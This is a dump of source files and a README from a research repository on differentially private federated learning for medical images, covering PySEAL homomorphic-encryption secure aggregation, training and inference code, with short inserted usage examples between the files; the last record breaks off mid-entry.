"text": "#!/bin/sh\n\n#\n# Script to build Linux SEAL libraries, python wrapper, and examples\n#\n\n# Install binary dependencies\nsudo apt-get -qqy update && apt-get install -qqy g++ git make python3 python3-dev\npython3-pip libdpkg-perl\n\ncd ~/\ngit clone https://github.com/Lab41/PySEAL.git\n\n# Build SEAL libraries\ncd ~/PySEAL/SEAL/\nchmod +x configure\nsed -i -e 's/\\r$//' configure\n./configure\nmake\nexport LD_LIBRARY_PATH=~/PySEAL/SEAL/bin:$LD_LIBRARY_PATH\n\n# Build SEAL C++ example\ncd ~/PySEAL/SEALExamples\nmake\n\n# Build SEAL Python wrapper\n\ncd ~/PySEAL/SEALPython\npip3 install --upgrade pip\npip3 install setuptools\npip3 install -r requirements.txt\ngit clone https://github.com/pybind/pybind11.git\ncd ~/PySEAL/SEALPython/pybind11\ngit checkout a303c6fc479662fd53eaa8990dbc65b7de9b7deb\ncd ~/PySEAL/SEALPython\npython3 setup.py build_ext -i\nexport PYTHONPATH=$PYTHONPATH:~/PySEAL/SEALPython:~/PySEAL/bin\n\n# add the following line to your .bashrc file in the home directory\n\n# export PYTHONPATH=$PYTHONPATH:~/PySEAL/SEALPython:~/PySEAL/bin\n\n# This will allow your python interpreter in the bash terminal to recognize the location of the library everytime you login. Add this path instead to the library paths for your python interpreter in pycharm to make it work in pycharm.\n\n\n"
},
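Once the build finishes, a quick smoke test can confirm the Python wrapper works. This sketch reuses only the PySEAL calls that appear in `src_secure_aggregation/FLDP_secure_aggregation.py`, with the same encryption parameters as that script:

```python
# Smoke test: encrypt two batched vectors, add them homomorphically, decrypt.
import seal
from seal import (Ciphertext, Decryptor, Encryptor, EncryptionParameters,
                  Evaluator, KeyGenerator, Plaintext, PolyCRTBuilder, SEALContext)

parms = EncryptionParameters()
parms.set_poly_modulus("1x^4096 + 1")
parms.set_coeff_modulus(seal.coeff_modulus_128(4096))  # 128-bit security
parms.set_plain_modulus(40961)
context = SEALContext(parms)

keygen = KeyGenerator(context)
encryptor = Encryptor(context, keygen.public_key())
decryptor = Decryptor(context, keygen.secret_key())
evaluator = Evaluator(context)
crtbuilder = PolyCRTBuilder(context)

slot_count = int(crtbuilder.slot_count())

def encrypt_vec(vec):
    # Pack the integer vector into batching slots and encrypt it.
    plain, enc = Plaintext(), Ciphertext()
    crtbuilder.compose(vec, plain)
    encryptor.encrypt(plain, enc)
    return enc

enc_sum = Ciphertext()
evaluator.add_many([encrypt_vec([1] * slot_count),
                    encrypt_vec([2] * slot_count)], enc_sum)

plain_sum = Plaintext()
decryptor.decrypt(enc_sum, plain_sum)
crtbuilder.decompose(plain_sum)
print(plain_sum.coeff_at(0))  # expected: 3
```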
{
"alpha_fraction": 0.6129667162895203,
"alphanum_fraction": 0.6213346719741821,
"avg_line_length": 43.85173416137695,
"blob_id": "e42290164a01105f964ee31f906fd5f862a3e9d0",
"content_id": "52e1556cb81547e855ba2c20fd1f7105392a02f3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14221,
"license_type": "permissive",
"max_line_length": 150,
"num_lines": 317,
"path": "/private_training/src_secure_aggregation/FLDP_secure_aggregation.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\n\nimport os\nimport copy\nimport time\nimport pickle\nimport numpy as np\n\nimport torch\nfrom tensorboardX import SummaryWriter\n\nfrom options import args_parser\nfrom update import LocalUpdate\nfrom utils import test_inference\nfrom models import CNNMnist, CNNFashion_Mnist, CNNCifar\nfrom utils import average_weights, exp_details\nfrom datasets_secure import get_train_dataset, get_test_dataset\n\nfrom opacus.dp_model_inspector import DPModelInspector\nfrom opacus.utils import module_modification\nfrom mpi4py import MPI\nimport random\nimport seal\nfrom seal import ChooserEvaluator, \\\n\tCiphertext, \\\n\tDecryptor, \\\n\tEncryptor, \\\n\tEncryptionParameters, \\\n\tEvaluator, \\\n\tIntegerEncoder, \\\n\tFractionalEncoder, \\\n\tKeyGenerator, \\\n\tMemoryPoolHandle, \\\n\tPlaintext, \\\n\tSEALContext, \\\n\tEvaluationKeys, \\\n\tGaloisKeys, \\\n\tPolyCRTBuilder, \\\n\tChooserEncoder, \\\n\tChooserEvaluator, \\\n\tChooserPoly\n\nfrom itertools import islice, chain, repeat\ndef chunk_pad(it, size, padval=None):\n it = chain(iter(it), repeat(padval))\n return iter(lambda: tuple(islice(it, size)), (padval,) * size)\n\ndef send_enc():\n list_params = []\n for param_tensor in model.state_dict():\n list_params += model.state_dict()[param_tensor].flatten().tolist()\n length = len(list_params)\n list_params_int = [0]*length\n for h in range(length):\n # Convert float values to integer so that they can be encrypted\n # length_integer is the maximum number of digits in the integer representation.\n # The returned value min_prec is the min number of dec places before first non-zero digit in float value.\n list_params_int[h] = round(list_params[h],3)*1000\n #length_integer = 3\n #list_params_int[h], min_prec = conv_int(list_params[h], length_integer)\n slot_count = int(crtbuilder.slot_count())\n pod_iter = iter(list_params_int)\n pod_sliced = list(chunk_pad(pod_iter, slot_count, 0)) # partitions the vector pod_vec into chunks of size equal to the number of batching slots\n for h in range(len(pod_sliced)):\n pod_sliced[h] = [int(pod_sliced[h][j]) for j in range(len(pod_sliced[h]))]\n for j in range(len(pod_sliced[h])):\n if pod_sliced[h][j] < 0:\n pod_sliced[h][j] = parms.plain_modulus().value() + pod_sliced[h][j]\n comm.send(len(pod_sliced), dest = 0, tag = 1)\n for chunk in range(len(pod_sliced)):\n encrypted_vec = Ciphertext()\n plain_vector = Plaintext()\n crtbuilder.compose(list(pod_sliced[chunk]), plain_vector)\n encryptor.encrypt(plain_vector, encrypted_vec)\n comm.send(encrypted_vec, dest = 0, tag=chunk+2)\n\n\ndef recv_enc(idx_local):\n num_chunks = comm.recv(source=idx_local, tag=1) # receive the number of chunks to be sent by the worker\n list_params_enc = []\n for chunk in range(num_chunks):\n list_params_enc += [comm.recv(source = idx_local, tag=chunk+2)]\n return list_params_enc\n\ndef average_weights_enc():\n list_sums = []\n for j in range(len(local_weights[0])):\n enc_sum = Ciphertext()\n list_columns = [local_weights[h][j] for h in range(len(local_weights))] # length of list_columns is equal to the number of active workers\n evaluator.add_many(list_columns,enc_sum)\n list_sums.append(enc_sum)\n return list_sums # element-wise sum of encrypted weight vectors received from active workers\n\ndef dec_recompose(enc_wts): # function to decrypt the aggregated weight vector received from parameter server\n dec_wts = []\n global_aggregate = {}\n chunks = len(enc_wts)\n for h in range(chunks):\n plain_agg = 
Plaintext()\n decryptor.decrypt(enc_wts[h], plain_agg)\n crtbuilder.decompose(plain_agg)\n dec_wts += [plain_agg.coeff_at(h) for h in range(plain_agg.coeff_count())]\n for h in range(len(dec_wts)):\n if dec_wts[h] > int(parms.plain_modulus().value() - 1) / 2:\n dec_wts[h] = dec_wts[h] - parms.plain_modulus().value()\n for h in range(len(dec_wts)):\n dec_wts[h] = float(dec_wts[h])/(1000*m)\n pos_start=0\n for param_tensor in flattened_lengths:\n pos_end = pos_start + flattened_lengths[param_tensor]\n global_aggregate.update({param_tensor:torch.tensor(dec_wts[pos_start:pos_end]).reshape(shapes[param_tensor])})\n pos_start=pos_end\n return global_aggregate\n\n\nif __name__ == '__main__':\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nworkers = comm.Get_size()-1\n workers = list(range(1,nworkers+1))\n start_time = time.time()\n print(\"Ids of workers: \", str(workers))\n print(\"Number of workers: \", str(nworkers))\n ## Generate encryption parameters at worker 1 and share them with all workers.\n # Share context object with the parameter server, so that it can aggregate encrypted values.\n if rank==1:\n # Initialize the parameters used for FHE\n parms = EncryptionParameters()\n parms.set_poly_modulus(\"1x^4096 + 1\")\n parms.set_coeff_modulus(seal.coeff_modulus_128(4096)) # 128-bit security\n parms.set_plain_modulus(40961)\n context = SEALContext(parms)\n comm.send(context, dest=0, tag=0) # send the context to the parameter server\n print(\"Sent context to server\")\n for i in workers[1:]:\n print(\"Sent context to worker \", str(i))\n comm.send(context, dest=i, tag=0) # send the context to the other workers\n\n keygen = KeyGenerator(context)\n public_key = keygen.public_key()\n secret_key = keygen.secret_key()\n for i in workers[1:]:\n print(\"Sending keys to worker \", str(i))\n comm.send(public_key, dest=i, tag=1) # send the public key to worker i\n comm.send(secret_key, dest=i, tag=2) # send the secret key to worker i\n\n encryptor = Encryptor(context, public_key)\n decryptor = Decryptor(context, secret_key)\n # Batching is done through an instance of the PolyCRTBuilder class so need\n # to start by constructing one.\n crtbuilder = PolyCRTBuilder(context)\n\n elif rank==0: # Parameter server\n context = comm.recv(source=1, tag=0) # parameter server receives only the context from worker 1\n evaluator = Evaluator(context)\n\n else: # Workers 2:num_users\n # The workers receive the context, public key, and secret key from worker 1\n context = comm.recv(source=1, tag=0)\n parms = context.parms()\n public_key = comm.recv(source=1, tag=1)\n secret_key = comm.recv(source=1,tag=2)\n encryptor = Encryptor(context, public_key)\n decryptor = Decryptor(context, secret_key)\n # Batching is done through an instance of the PolyCRTBuilder class so need\n # to start by constructing one.\n crtbuilder = PolyCRTBuilder(context)\n\n # define paths\n path_project = os.path.abspath('..')\n logger = SummaryWriter('../logs')\n\n args = args_parser()\n exp_details(args)\n\n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu'\n m = max(int(args.frac * args.num_users), 1) # Number of active workers in each round\n # load datasets in each user. 
Note that the datasets are not loaded in the parameter server.\n if rank >= 1:\n train_dataset, user_groups = get_train_dataset(args,rank) # user_groups consists of the ids of the data samples that belong to current worker\n\n if rank == 0:\n # BUILD MODEL\n test_dataset = get_test_dataset(args)\n if args.model == 'cnn':\n # Convolutional neural network\n if args.dataset == 'mnist':\n global_model = CNNMnist(args=args)\n elif args.dataset == 'fmnist':\n global_model = CNNFashion_Mnist(args=args)\n elif args.dataset == 'cifar10' or args.dataset == 'cifar100':\n global_model = CNNCifar(args=args)\n else:\n exit('Error: unrecognized model')\n\n ### DPSGD OPACUS ###\n if args.withDP:\n try:\n inspector = DPModelInspector()\n inspector.validate(global_model)\n print(\"Model's already Valid!\\n\")\n except:\n global_model = module_modification.convert_batchnorm_modules(global_model)\n inspector = DPModelInspector()\n print(f\"Is the model valid? {inspector.validate(global_model)}\")\n print(\"Model is convereted to be Valid!\\n\")\n\n u_steps = np.zeros(args.num_users)\n ###########\n\n # Set the model to train and send it to device.\n global_model.to(device)\n global_model.train()\n print(global_model)\n\n # copy weights\n global_weights = global_model.state_dict()\n\n # Training\n val_acc_list, net_list = [], []\n cv_loss, cv_acc = [], []\n print_every = 10\n val_loss_pre, counter = 0, 0\n\n for idx in range(1, args.num_users + 1): # this loop sends the global model to all the workers\n comm.send(global_model, dest=idx, tag=idx)\n\n for epoch in range(args.epochs):\n local_weights, local_losses = [], []\n idxs_users = np.random.choice(range(1,args.num_users+1), m, replace=False)\n print(\"active users: \", str(idxs_users))\n for i in idxs_users: # send the epoch values only to the active workers in the current round\n print(\"Sending epoch to active_user: \", str(i))\n comm.send(epoch, dest=i,tag=i)\n\n if (epoch > 0) and (epoch < args.epochs -1):\n for idx in idxs_users: # this loop sends the encrypted global aggregate to all active workers of the current round\n comm.send(global_weights, dest=idx, tag=idx)\n\n #The receives are decoupled from the sends, ELSE the code will send global model, then wait for updates, and only then\n #move to send the global model to the second worker. But we want the processing to be in parallel. 
Therefore, all the sends are\n #implemented in a loop, and after that all the receives are implemented in a loop\n for idx in idxs_users: # this loop receives the updates from the active workers\n u_steps[idx-1] = comm.recv(source=idx, tag=idx)\n print(idx)\n if epoch == args.epochs-1:\n local_weights.append(comm.recv(source=idx, tag=idx)) # receive unencrypted model update parameters from worker i\n elif epoch < args.epochs-1:\n local_weights.append(recv_enc(idx)) # receive encrypted model update parameters from worker i\n\n #In the last epoch, the weights are received unencrypted,\n #therefore, the weights are aggregated and the global model is updated\n print(\"Length of local weights: \", str(len(local_weights)))\n if epoch == args.epochs-1:\n # update global weights\n global_weights = average_weights(local_weights) # Add the unencrypted weights received\n global_model.load_state_dict(global_weights)\n workers = list(range(1, nworkers + 1))\n print(\"Workers: \", str(workers))\n print(\"Active users in last round: \", str(idxs_users))\n for wkr in idxs_users:\n workers.remove(wkr)\n print(\"Residue workers: \", str(workers)) # Printing the ids of workers which are still listening for next round's communication.\n for i in workers:\n print(\"Sending exit signal to residue worker: \", str(i))\n comm.send(-1, dest=i, tag=i)\n break # break out of the epoch loop.\n elif epoch < args.epochs-1:\n # Add the encrypted weights\n global_weights = average_weights_enc() # Add the encrypted weights received\n\n elif rank >= 1:\n local_model = LocalUpdate(args=args, dataset=train_dataset,\n u_id=rank,\n idxs=user_groups, logger=logger)\n u_step=0\n model = comm.recv(source=0, tag=rank) # global model is received from the parameter server\n print(\"Worker \", str(rank), \" received global model\")\n flattened_lengths = {param_tensor: model.state_dict()[param_tensor].numel() for param_tensor in\n model.state_dict()}\n shapes = {param_tensor: list(model.state_dict()[param_tensor].size()) for param_tensor in\n model.state_dict()} # dictionary of shapes of tensors\n\n while True:\n epoch = comm.recv(source=0, tag=rank) # receive the epoch/communication round that the parameter server is in\n if epoch == -1:\n break\n #The server sends the latest weight aggregate to this worker,\n #based on which the local model is updated before starting to train.\n if (epoch < args.epochs-1) and (epoch > 0):\n enc_global_aggregate = comm.recv(source=0, tag=rank)\n ## decrypt and recompose enc_global_aggregate\n global_aggregate = dec_recompose(enc_global_aggregate)\n model.load_state_dict(global_aggregate)\n u_step += 1\n # Now perform one iteration\n w, loss, u_step = local_model.update_weights(model=model, global_round=epoch,u_step=u_step)\n comm.send(u_step, dest=0, tag=rank) # send the step number\n if epoch < args.epochs-1:\n send_enc() # send encrypted model update parameters to the global agent\n elif epoch == args.epochs-1:\n comm.send(w, dest=0, tag = rank) # send unencrypted model update parameters to the global agent\n break\n\n if rank==0:\n # Test inference after completion of training\n test_acc, test_loss = test_inference(args, global_model, test_dataset)\n\n print(f' \\n Results after {args.epochs} global rounds of training:')\n print(\"|---- Test Accuracy: {:.2f}%\".format(100 * test_acc))\n\n print('\\n Total Run Time: {0:0.4f}'.format(time.time() - start_time))\n\n\n\n"
},
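The script above moves model weights into the plaintext space by fixed-point scaling. A minimal pure-Python sketch of that encoding (hypothetical weights and worker count `m`; `t` is the plain modulus used above), showing how negatives wrap around the modulus and how the average is recovered:

```python
# Fixed-point trick: scale floats by 1000, map into Z_t, sum, unwrap, divide.
t = 40961          # plain modulus from the SEAL parameters above
m = 2              # number of active workers (hypothetical)

def encode(x):
    v = int(round(x * 1000))   # 3 decimal places of precision
    return v % t               # negatives become t + v

def decode(v):
    if v > (t - 1) // 2:       # values above t/2 represent negatives
        v -= t
    return v

weights_a = [0.123, -0.456]    # hypothetical flattened weights, worker A
weights_b = [0.001, 0.789]     # hypothetical flattened weights, worker B

sums = [(encode(a) + encode(b)) % t for a, b in zip(weights_a, weights_b)]
avg = [decode(s) / (1000 * m) for s in sums]
print(avg)  # -> [0.062, 0.1665]
```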
{
"alpha_fraction": 0.5588235259056091,
"alphanum_fraction": 0.5702614188194275,
"avg_line_length": 34.94117736816406,
"blob_id": "a55a3d0ce963cc1817a27e5c24968d477a3f7c44",
"content_id": "1165b7e370a06bd2692d1966e38c7eb636f46979",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1224,
"license_type": "permissive",
"max_line_length": 146,
"num_lines": 34,
"path": "/private_training/src/logging_results.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "\nimport os\nimport numpy as np\nfrom utils import test_inference\n\n\ndef logging(args, epoch, train_loss, test_log, epsilon_log=None):\n print(\"\\nEpoch:\", epoch+1)\n\n log_dir_train = './logs/train_log/'\n if not os.path.exists(log_dir_train):\n os.makedirs(log_dir_train)\n \n print('Average train loss:', train_loss[-1]) \n with open(log_dir_train+args.exp_name+'_train.txt', 'w') as f:\n for item in train_loss:\n f.write(\"%s\\n\" % item)\n\n log_dir_test = './logs/test_log/'\n if not os.path.exists(log_dir_test):\n os.makedirs(log_dir_test)\n\n print(\"Test Accuracy: {:.2f}%\".format(100*test_log[-1][0])) \n with open(log_dir_test+args.exp_name+'_test.txt', 'w') as f:\n for item in test_log:\n f.write(\"%s\\n\" % item)\n\n if epsilon_log:\n log_dir_eps = './logs/privacy_log/'\n if not os.path.exists(log_dir_eps):\n os.makedirs(log_dir_eps)\n print(\"epsilons: max {:.2f}, mean {:.2f}, std {:.2f}\".format(np.max(epsilon_log[-1]), np.mean(epsilon_log[-1]), np.std(epsilon_log[-1])))\n with open(log_dir_eps+args.exp_name+'_eps.txt', 'w') as f:\n for item in epsilon_log:\n f.write(\"%s\\n\" % item)\n\n"
},
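A hypothetical dry run of `logging()` (executed from `private_training/src` so its `utils` import resolves); `args.exp_name` is the only argument attribute the function reads, so a namespace stub suffices:

```python
from types import SimpleNamespace
from logging_results import logging

args = SimpleNamespace(exp_name="demo_run")       # hypothetical experiment name
train_loss = [2.31, 1.87]                         # average train loss per eval
test_log = [[0.41, 2.10], [0.55, 1.76]]           # [accuracy, loss] per eval
epsilon_log = [[1.2], [1.9]]                      # epsilons per eval

logging(args, 1, train_loss, test_log, epsilon_log)
# Writes ./logs/train_log/demo_run_train.txt, ./logs/test_log/demo_run_test.txt
# and ./logs/privacy_log/demo_run_eps.txt
```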
{
"alpha_fraction": 0.5751329660415649,
"alphanum_fraction": 0.5764627456665039,
"avg_line_length": 27.39622688293457,
"blob_id": "39641ccd014ad80597c51d1c8f2468f96aec4478",
"content_id": "4058723be3a6ab6cd376d389e9181ac94911ef38",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1504,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 53,
"path": "/private_training/src/dr_dataset_to_numpy.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport copy\nimport time\nimport pickle\nimport numpy as np\nimport torch\nfrom options import args_parser\nfrom datasets import get_dataset\n\n\n\nif __name__ == '__main__':\n \n ############# Common ###################\n args = args_parser() \n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu' \n \n # load dataset and user groups\n train_dataset, test_dataset, user_groups = get_dataset(args)\n \n print(\"train_dataset size:\", len(train_dataset))\n print(\"test_dataset size:\", len(test_dataset))\n # print(\"data shape:\", train_dataset[0][0].shape)\n print(\"train\")\n dr_images = []\n dr_labels = []\n for i in range(len(train_dataset)): \n _image, _label = train_dataset[i]\n dr_images.append(_image.numpy())\n dr_labels.append(_label)\n print(\" \", i, end=\"\\r\")\n print(\"\")\n dr_images = np.array(dr_images)\n dr_labels = np.array(dr_labels)\n np.save(\"dr_train_images.npy\", dr_images)\n np.save(\"dr_train_labels.npy\", dr_labels)\n print(\"test\")\n dr_images = []\n dr_labels = []\n for i in range(len(test_dataset)): \n _image, _label = test_dataset[i]\n dr_images.append(_image.numpy())\n dr_labels.append(_label)\n print(\" \", i, end=\"\\r\")\n print(\"\")\n dr_images = np.array(dr_images)\n dr_labels = np.array(dr_labels)\n np.save(\"dr_test_images.npy\", dr_images)\n np.save(\"dr_test_labels.npy\", dr_labels)\n\n print(\"Done!\")"
},
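The arrays saved above are what `datasets.py` reads back when `--dr_from_np=1`; a minimal sketch of that reload path (file names as written by the script):

```python
import numpy as np
import torch
from torch.utils.data import TensorDataset

# Rebuild the training set from the cached arrays instead of re-downloading.
images = torch.Tensor(np.load("dr_train_images.npy"))
labels = torch.Tensor(np.load("dr_train_labels.npy")).long()
train_dataset = TensorDataset(images, labels)
print(len(train_dataset), train_dataset[0][0].shape)
```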
{
"alpha_fraction": 0.7768834233283997,
"alphanum_fraction": 0.7891178131103516,
"avg_line_length": 69.54545593261719,
"blob_id": "8444f2e112a3831fc659eedb0a810a2a153f90ad",
"content_id": "3170268b23fa06e98be11e44614c92ea90debc6d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3106,
"license_type": "permissive",
"max_line_length": 800,
"num_lines": 44,
"path": "/README.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Dopamine: Differentially Private Federated Learning on Medical Data\n\n- Please read the paper here: https://arxiv.org/abs/2101.11693 \n\n- Chosen as the best submission to [ITU AI/ML in 5G Challenge](https://www.itu.int/en/ITU-T/AI/challenge/2020/Pages/default.aspx) for [ITU-ML-5G-PS-022](https://sites.google.com/view/iitd5g/challenge-problems/privacy-preserving-aiml-in-5g-networks-for-healthcare-applications)\n\n\n## Abstract \nWhile rich medical datasets are hosted in hospitals distributed across the world, concerns on patients' privacy is a barrier against using such data to train deep neural networks (DNNs) for medical diagnostics. We propose Dopamine, a system to train DNNs on distributed datasets, which employs federated learning (FL) with differentially-private stochastic gradient descent (DPSGD), and, in combination with secure aggregation, can establish a better trade-off between differential privacy (DP) guarantee and DNN's accuracy than other approaches. Results on a diabetic retinopathy~(DR) task show that Dopamine provides a DP guarantee close to the centralized training counterpart, while achieving a better classification accuracy than FL with parallel DP where DPSGD is applied without coordination. \n\n## Folders:\n \n1. `report`: includes the final report. For `1.Design document showing the reasons for the choice of privacy-preserving technique and the network architectural components.`\n2. `private_training`: includes the source code and a JupyterNotebook tutorial for training the privacy-preserving model explained in the report. For `2.Source code for the implementation of the privacy-preserving design across various architectural components.`\n3. `private_inference`: includes the source code and demo for running inference on the privately trained model. For `3.Tested code and Test Report for all implementations- Implementations of Privacy-Preserving AI Technique, Trained Data Model, UI on smartphone.`\n4. `video_demo`: include some video demos showing how to run training and inference. For `4. A Video of the demonstration of Proof-of-Concept.`\n\n\n## Tutorial\n\nWe provided a Jupyter Notebook for training on Google Colab. Please see the file `JNotebook_running_FSCDP_on_Colab.ipynb` in the `private_training` folder.\n\n## Live Demo:\n\nPlease use this link to get an inference on a Diabetic Retinopathy medical image:\n\nhttps://imperial-diagnostics.herokuapp.com/\n\n(Note: implementing the pure private inference is still in progress...)\n\n## Citation\nIf you find the provided code or the proposed algorithms useful, please cite this work as:\n```bibtex\n@article{malekzadeh2021dopamine,\n title={Dopamine: Differentially Private Federated Learning on Medical Data},\n author={Malekzadeh, Mohammad and Hasircioglu, Burak and Mital, Nitish and Katarya, Kunal and Ozfatura, Mehmet Emre and Gündüz, Deniz}, \n journal= {The Second AAAI Workshop on Privacy-Preserving Artificial Intelligence (PPAI-21)},\n year={2021},\n url = {https://github.com/ipc-lab/private-ml-for-health}\n}\n```\n\n## Collaboration/Contribution\nWe kindly welcome collaboration and/or contribution to this work. Please feel free to drop a line to us via email or by opening an issue. \n"
},
{
"alpha_fraction": 0.6490156054496765,
"alphanum_fraction": 0.6768499612808228,
"avg_line_length": 35.82500076293945,
"blob_id": "e629b6c085710824da1350d2ce485f7d7c2955e8",
"content_id": "0b1d9491c3c3b996bb1b47ef4c74d5c4882e9c92",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1473,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 40,
"path": "/private_inference/app/commons.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import io\nfrom PIL import Image\nfrom torchvision import models\nimport torch\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport urllib\nimport os\n\ndef get_model_from_global_agent():\n global_model = models.squeezenet1_1(pretrained=True)\n global_model.classifier[1] = nn.Conv2d(512, 5, kernel_size=(1,1), stride=(1,1))\n global_model.num_classes = 5\n global_model.to(torch.device('cpu'))\n map_location=torch.device('cpu')\n model_weights_link = 'https://drive.google.com/uc?id=11pb2yJKXgyYC9XnB9cd6HlNCFNxnlY1D'\n model_weights_path = './model/squeezenet_0.pt'\n urllib.request.urlretrieve(model_weights_link, model_weights_path)\n global_model.load_state_dict(torch.load(\"./model/squeezenet_0.pt\", map_location=torch.device('cpu')))\n os.remove(model_weights_path)\n global_model.eval()\n return global_model\n\n\ndef transform_image(image_bytes):\n apply_transform = transforms.Compose([transforms.Resize(265),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n image = Image.open(io.BytesIO(image_bytes)).convert('RGB')\n return apply_transform(image).unsqueeze(0)\n\n\n\n# change to DR dataset format\ndef format_class_name(class_name):\n class_name = class_name.replace('_', ' ')\n class_name = class_name.title()\n return class_name\n"
},
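A hypothetical end-to-end use of these helpers (the input path is illustrative; `get_model_from_global_agent()` expects a writable `./model/` directory for the downloaded weights):

```python
import torch
from commons import get_model_from_global_agent, transform_image

model = get_model_from_global_agent()  # downloads and loads the trained weights

# Hypothetical example scan from the app's example_inputs folder.
with open("example_inputs/sample.png", "rb") as f:
    tensor = transform_image(f.read())

with torch.no_grad():
    logits = model(tensor)             # shape [1, 5]: one logit per DR grade
grade = int(logits.argmax(dim=1).item())
print(f"Predicted diabetic retinopathy grade: {grade}")
```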
{
"alpha_fraction": 0.5528191924095154,
"alphanum_fraction": 0.5664290189743042,
"avg_line_length": 36.63414764404297,
"blob_id": "850069d8d8ef081914fcfe8316020f7afa4bb0e3",
"content_id": "d25dcb920ea69228732c8384095e2a270b930954",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4629,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 123,
"path": "/private_training/src/baseline_main.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\n# import matplotlib.pyplot as plt\n\nfrom datasets import get_dataset\nfrom options import args_parser\nfrom utils import test_inference\nfrom models import CNNMnistRelu, CNNMnistTanh, CNNFashion_MnistRelu, CNNFashion_MnistTanh\nfrom torchvision import models \nfrom torchsummary import summary\n\nif __name__ == '__main__':\n\n ############# Common ###################\n args = args_parser()\n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu'\n\n # load datasets\n train_dataset, test_dataset, _ = get_dataset(args)\n\n # BUILD MODEL\n if args.model == 'cnn':\n # Convolutional neural netork\n if args.dataset == 'mnist':\n if args.activation == 'relu':\n global_model = CNNMnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNMnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'fmnist':\n if args.activation == 'relu':\n global_model = CNNFashion_MnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNFashion_MnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'cifar10':\n # global_model = models.resnet18(num_classes=10) \n if args.activation == 'relu':\n global_model = CNNCifar10Relu()\n elif args.activation == 'tanh':\n global_model = CNNCifar10Tanh()\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n elif args.dataset == 'dr':\n if args.activation == 'relu':\n global_model = CNNCifar10Relu()\n elif args.activation == 'tanh':\n global_model = CNNCifar10Tanh()\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n elif args.dataset == 'cifar100': \n global_model = models.resnet50(num_classes=100)\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n else:\n exit('Error: unrecognized model')\n ############# Common ###################\n\n # Set the model to train and send it to device.\n global_model.train() \n \n # Set optimizer and criterion\n if args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(global_model.parameters(), lr=args.lr, momentum=args.momentum)\n elif args.optimizer == 'adam':\n optimizer = torch.optim.Adam(global_model.parameters(), lr=args.lr)\n\n trainloader = DataLoader(train_dataset, batch_size=args.local_bs, shuffle=True)\n criterion = nn.CrossEntropyLoss()\n \n epoch_loss = []\n\n # train_log = []\n test_log = []\n for epoch in range(args.epochs):\n batch_loss = []\n\n for batch_idx, (images, labels) in enumerate(trainloader):\n \n images, labels = images.to(device), labels.to(device)\n\n optimizer.zero_grad()\n outputs = global_model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n # if batch_idx % args.verbose == 0:\n # print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n # epoch+1, batch_idx * len(images), len(trainloader.dataset),\n # 100. 
* batch_idx / len(trainloader), loss.item()))\n batch_loss.append(loss.item())\n\n loss_avg = sum(batch_loss)/len(batch_loss)\n print(\"\\nEpoch:\", epoch+1)\n print('Train loss:', loss_avg)\n epoch_loss.append(loss_avg)\n\n # training accuracy\n # _acc, _loss = test_inference(args, global_model, train_dataset)\n # print('Train on', len(train_dataset), 'samples')\n # print(\"Train Accuracy: {:.2f}%\".format(100*_acc))\n # train_log.append([_acc, _loss])\n\n # testing accuracy\n _acc, _loss = test_inference(args, global_model, test_dataset)\n \n print('Test on', len(test_dataset), 'samples')\n print(\"Test Accuracy: {:.2f}%\".format(100*_acc))\n test_log.append([_acc, _loss])\n\n log_dir = './test_log/'\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n with open(log_dir+args.exp_name+'_test_log.txt', 'w') as f:\n for item in test_log:\n f.write(\"%s\\n\" % item)\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 44,
"blob_id": "7e132a929ca44c667e82e18f632230183ad0f5eb",
"content_id": "58b0b566011bb58bfc84ea8b555acfff5662faa9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 2,
"path": "/report/ReadME.md",
